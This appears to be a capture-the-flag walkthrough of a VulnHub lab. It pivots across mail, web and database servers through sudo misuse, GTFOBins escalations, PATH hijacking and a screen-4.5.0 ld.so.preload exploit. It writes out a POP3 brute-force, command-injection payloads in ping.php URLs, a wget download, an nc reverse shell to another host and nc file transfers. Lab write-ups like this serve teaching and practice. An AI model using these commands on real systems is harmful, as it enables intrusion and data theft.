2becbdd67f1ce62cc6ef2601b6f95ec2.png

0. Preface

This box is pretty long, but relatively easy (YMMV). This just requires some enumeration and knowing what to exploit. GTFOBins is really your best friend in this box. Having knowledge of how SSH tunneling works is helpful too.

tmux makes this box a lot less of a headache.

In this box, we will be tackling:

  1. Exploiting sudo privileges on the MailServer.
  2. Pwning the MailServer using zip.
  3. Pivoting to and exploiting the WebServer using unsanitised PHP code.
  4. Escalating privileges on the WebServer using python3.
  5. Pwning the WebServer with PATH hijacking.
  6. Pwning the DatabaseServer using screen.

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt 192.168.32.15 -v

65fe5ab066765ab3ede67037935e97fe.png

01df6f4e5cb487262a79e3b4bfc1c392.png

There are plenty of open ports here - 80, 2222 (SSH), 110, 8000 and 9000. Let’s check out the web server on port 80 first.

2. The Task

0390e98af702f31480bb865bb4d1595f.png

So, we can’t attack ports 8000, 9000 and this page. This leaves us with only ports 2222 and 110. Apparently we also have mail on port 110, so let’s check that out.

telnet 192.168.32.15 110

USER pentester
PASS qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
LIST

0b498267de764e6314194a93b64607ef.png

There’s only one message. We can use RETR 1 to read it.

b7d34c0a8ce9f96889b17dc7cc4eb2a5.png

Let’s try to guess the username for this server administrator. The following is the list that we come up with.

45e5844f9af54ee34bdff9d2407618ff.png

Now, let’s try to bruteforce with hydra, taking into consideration the following hint on the VulnHub description for the box.

636355e2097b841cc5979c66d7b6ab2e.png

grep bobby /usr/share/wordlists/rockyou.txt > ./wordlist.txt
hydra -L pop3_usernames.txt -P ./wordlist.txt pop3://192.168.32.15

67da9547ed8867873e8471bda379b79a.png

Sweet, we have our first set of credentials - bob:bobby1985.

3. Exploiting Sudo Privileges on MailServer

Let’s see if bob has any mail.

telnet 192.168.32.15 110

USER bob
PASS bobby1985
LIST

7dbfd2df5d0300813bb6fe080667d55c.png

Doesn’t seem to have any, so let’s try to SSH to the box as bob.

c91a64bfd1b27d5ee021d828e965f280.png

Seems like we’re in the MailServer. Let’s start off with enumeration.

936151868301284b8fffc35e073d7d91.png

Looking at sudo -l, we see that bob is able to run a script in /opt/scripts/check.sh as my2user. Let’s check out /etc/passwd next.

18297925194046c8ceaee57a8e921e37.png

There’s nothing we don’t already know in here, so let’s take a look at the script at /opt/scripts/check.sh.

5eae2357f0d8d750be492e20d1ca2572.png

The script can be edited by bob, so let’s just add /bin/bash to the script and run it using sudo to move to my2user.

5baff42bc706d5f6bccc26de3e2d1935.png

sudo -u my2user /bin/bash /opt/scripts/check.sh

b0593bbfde79aa50b960231104f17aad.png

4. Pwning the MailServer with SUID bit set on Zip

Again, looking at sudo -l for my2user, we see that it is able to run /usr/bin/zip as root.

2a7a81940e97ece28863d009cb45f9a3.png

Before we move on, generate a key using ssh-keygen on our local machine and upload it so we can access my2user easily.

a34bacb45ce47874bd6bdd20896bfa74.png

49478b433e9e5ffa21f53dacb57532be.png

Let’s login again with the new key.

200137723955aefda01c876292cf6cb3.png

Going back to the zip binary, let’s take a look at GTFOBins to see what we might be able to exploit.

304cd8de93f2c854c5bab3ba90ff1c0b.png

Great, we have a privilege escalation path. Let’s do that.

0813fc0daf34c963c1ff5f21f13ff315.png

Nice, let’s upload the same SSH key we used for my2user so we can easily access root too. Again, re-login to the mail server as root.

c58ae69231d9713049d8feb991f99733.png

Let’s grab the flag.

d61534ab5e422c8b83ee6d86f67a1569.png

Next stop, WebServer.

5. Pivoting to Web Server and Exploiting Unsanitised PHP Code

First, let’s take a look at ifconfig.

5491d7db039db7272cfac0d94a049324.png

We will need to find out if there are other IP addresses in this subnet, so let’s upload netdiscover from our local box. We can use netdiscover to scan the subnet 172.17.0.0/16 on eth0. We know that it is a /16 subnet because of the subnet mask of 255.255.0.0.

./netdiscover -i eth0 -r 172.17.0.0/16

8d77e6b4ad5e20f574ffb42f83634eb1.png

Let’s also take a look at the routing table to figure out which one is the gateway.

route -n

fea8dc0cb223c3a50e58d0ce6e04cdba.png

This means we can ignore 172.17.0.1 and focus on the others - 172.17.0.2, 172.17.0.3 and 172.17.0.4. Now, we will upload and use nc to do port discovery for the other three hosts.

./nc -znv 172.17.0.2 1-1023
./nc -znv 172.17.0.3 1-1023
./nc -znv 172.17.0.4 1-1023

e0645a05840ffaef3bfbba5a1595384a.png

172.17.0.2 does not seem to have any common open ports. It also seems like the web server is located at 172.17.0.3, due to the open port 80.

172.17.0.4 also has ftp open. Let’s first check that out to see if we can access it anonymously.

bcb7b7f160ec1d250980827f439fe46c.png

We can, and there’s just an empty file at /pub/test. Moving on, let’s try to access the web server using curl on the MailServer.

9a50e52230a35255d2cc0f8eabd0e297.png

Good, now we need a way to port forward our machine to this host so that we can run gobuster. We can do so using ssh. The below command forwards port 8000 on our local machine to the WebServer’s port 80.

ssh -L 8000:172.17.0.3:80 root@192.168.32.15 -p 2222 -i keys/id_rsa
curl localhost:8000

deadaad9767ae35bfb8082113d2a40a3.png

gobuster dir -u http://localhost:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster-webserver.txt

bb3ba4b6e0d123bfe886b557f39ee7bb.png

Let’s visit /ping in our web browser using http://localhost:8000/ping.

0d5ea0c49cd30e7f179893be71d55f7b.png

Let’s start off by check out For-Oscar.txt.

ff464e26c1795bb662be1d663f478cea.png

Nothing much here, so let’s check out ping.php next.

fef8df1b88a8535836322256e15a5cbc.png

Interesting. Let’s try appending ?host=172.17.0.5.

4231d823bf3f04c968b1d280e895ffb6.png

Seems like it’s calling the ping command using PHP, then putting each line into an array and displaying it. Let’s try to execute other commands with this by appending ?host=; whoami instead.

35f904c6a286d57a99e3e90eaba25902.png

Awesome, we have RCE. Let’s upload an nc binary from our machine to the MailServer, then from the MailServer to the WebServer. We will also make the binary executable using chmod 777.

I realised after pwning the WebServer that I didn’t have to transfer nc through the MailServer. All the servers can reach my local machine.

http://localhost:8000/ping/ping.php?host=; wget http://172.17.0.5:9000/nc
http://localhost:8000/ping/ping.php?host=; chmod 777 nc
http://localhost:8000/ping/ping.php?host=; ls -la nc; pwd

ceece73e45cb8560b79f155fe755b2fa.png

81b2d647366567d77c665c7d7e6b8f8b.png

Great, now we can get a bash reverse shell from the WebServer back to the MailServer.

http://localhost:8000/ping/ping.php?host=; /var/www/html/ping/nc 172.17.0.5 9000 -e /bin/bash

0c060136c33153d22128881d3689811b.png

Let’s enumerate a bit using this.

4c7ee1514c1019b9473b20d01b430207.png

There are two users in /etc/passwd that we can potentially move to. Let’s see what files each of them own.

d3bae84197de874a492fc71eb3d12068.png

We find a file in /var/backups/.secret owned by oliver.

4e6571b96817b05e0bc748cfc06b14a3.png

Now we have our second set of credentials - oliver:4hppfvhb9pW4E4OrbMLwPETRgVo2KyyDTqGF. Let’s ssh to the web server as oliver from the MailServer.

dcd50a10b9178c7de6967c8b521bf88f.png

6. Pwning WebServer with Python3 and PATH Hijacking

Let’s start off by uploading and running linpeas.sh.

4858051eed4027f68a1f1bddf0d4cd56.png

Under the SUID section, we see that python3 has the SUID bit set. Let’s check out who owns the binary.

2f984eccd25fd570353641c010f83473.png

Good, we should be able to move to oscar using this binary. Again, thanks to GTFOBins, we can run the following command to move to oscar.

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

6d1ce7c661af1f8822df6064519ca82d.png

93ed25c7928246dfb254089b9e1915e4.png

Conveniently, there’s a password for oscar right on his home directory. We now have our third set of credentials - oscar:H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o. Let’s login again to the WebServer over SSH.

7b6a5bd097282b8ba9562bcc011e7d44.png

Let’s look around a bit.

f21096b40075e227e0062b6aa50f3b9e.png

We find a binary in /home/oscar/scripts called current-date, which is owned by root and has the SUID bit set. Let’s see what this binary is running using strings.

3dfd19a26af5a9b5a1a7dfc677e0b91c.png

Looks like it’s trying to run date. We can exploit that by adding /home/oscar to the PATH variable, then creating a date script that calls /bin/bash.

export PATH=/home/oscar:$PATH

extra1.png

ade28228c72b1e743a7f974d28da07d4.png

Next stop, DatabaseServer.

7. Pwning the Database Server using Screen

Recall that FTP server on 172.17.0.4 earlier? That should most likely be the database server. Let’s dig a bit deeper than just now.

493cac04806942fa0eb3adddfc1db25f.png

There’s a hidden .folder we missed earlier.

bf5b6a25825ae7ea0a00391bed362b3a.png

Let’s download .backup.zip and see what we can get from it.

c25c03c58227cb8b10ad862ecf384471.png

538ec7e05fac4e1be0001da4b599e5ab.png

Turns out we need a password. Let’s download the zip file back to our local machine, then extract the password hash with zip2john, then crack it with john. We can use nc to transfer the file.

#Remote Server
nc -w 3 192.168.32.4 8000 < backup.zip

#Local Machine
nc -lvnp 8000 > backup.zip

fca703fb1e60734ef80821b9ec64b0e3.png

zip2john backup.zip
sudo john --wordlist:/usr/share/wordlists/rockyou.txt backup.hash

d0a1554de3af6e4fe239794061b85641.png

Nice, let’s extract and read creds.txt.

1dfa4b97bb5126977d875f96b3f8315e.png

We now have our fourth set of credentials - donald:HBRLoCZ0b9NEgh8vsECS. Let’s use SSH to login to the server via the MailServer.

1629aedb05eb1a702a060130e9084991.png

Again, we will upload and run linpeas.sh.

88907a78f779581f66ccbca1db5df8b3.png

Immediately, we see that screen-4.5.0 is most likely a privilege escalation vector. Let’s see what GTFOBins have to say about that one.

4b90badd7def298ad84df5af52383dc4.png

We can apparently write files as a privileged user. After Googling a bit, we find an exploit that can allow us to escalate privileges to root using screen by overwriting /etc/ld.so.preload.

/etc/ld.so.preload will load libraries included in the file first before any other shared libraries. This exploit makes use of the fact that screen is able to write files as root, and hence is able to overwrite /etc/ld.so.preload.

First, the script creates a libhax.so “library” in /tmp, which changes the owner of /tmp/rootshell to root, and sets the SUID bit. This also deletes the existing /etc/ld.so.preload file.

2de3940a18f68a1c975a748bf21c0bb8.png

Next, the script creates the /tmp/rootshell binary which executes /bin/sh.

3bc9964803e3cb729cf25ca323382b4b.png

Finally, the script uses screen to write to /etc/ld.so.preload to get it to execute /tmp/libhax.so, then run screen -ls to trigger the “library” (which runs chmod & chown on /tmp/rootshell), then executes /tmp/rootshell.

0b7b76e91bcc7e912ffccd99dd772d5b.png

With the explanation out of the way, let’s copy the script into a file and run it.

0a0480d20f8dcd51de3f35b40c6c603e.png

fbf9f7c2794e977e0e487b12c06aa329.png

And we’re done.